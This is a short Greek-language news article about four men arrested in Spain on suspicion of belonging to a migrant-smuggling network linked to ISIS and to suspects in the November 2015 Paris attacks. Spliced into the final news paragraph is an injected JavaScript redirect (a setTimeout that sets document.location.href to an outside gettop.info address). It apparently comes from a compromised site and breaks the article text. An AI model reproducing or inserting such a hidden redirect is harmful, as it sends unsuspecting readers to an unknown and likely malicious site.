Ισπανία: Συνελήφθησαν 4 ύποπτοι για διακίνηση μεταναστών και σχέσεις με το ISIS

 

Τέσσερις άνδρες συνελήφθησαν στην Ισπανία ως ύποπτοι για συμμετοχή σε παράνομο δίκτυο διακίνησης μεταναστών με διασυνδέσεις με το Ισλαμικό Κράτος.

Οι τέσσερις συλληφθέντες ανακρίνονται για διασυνδέσεις με δύο υπόπτους που προφυλακίστηκαν τον περασμένο χρόνο στην Αυστρία για πιθανή σχέση με τους δράστες των τρομοκρατικών επιθέσεων στο Παρίσι στις 13 Νοεμβρίου 2015.

Δύο από τους συλληφθέντες είναι κάτοικοι της Γαλικίας, στη βορειοδυτική Ισπανία, ενώ οι άλλοι δύο δρούσαν στην Ανδαλουσία, την επαρχία της νότιας Ισπανίας, ανακοίνωσε το υπουργείο Εσωτερικών χωρίς, ωστόσο, να δώσει περισσότερες πληροφορίες.

Σύμφωνα με τα στοιχεία του υπουργείου, το ISIS φέρεται να χρησιμοποίησε το δίκτυο διακίνησης μεταναστών για να περάσει τζιχαντιστές στην Ευρώπη μέσω της Τουρκίας ανάμεσα στους πρόσφυγες και τους μετανάστες που εγκατέλειψαν τη Συρία για να γλυτώσουν από τον εμφύλιο.

Σε αυτούς συγκαταλέγονται οι τζιχαντιστές που πραγματοποίησαν τις επιθέσεις στο Παρίσι τον Νοέμβριο 2015. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

Σχετικά Άρθρα


Αφήστε το σχόλιο σας

*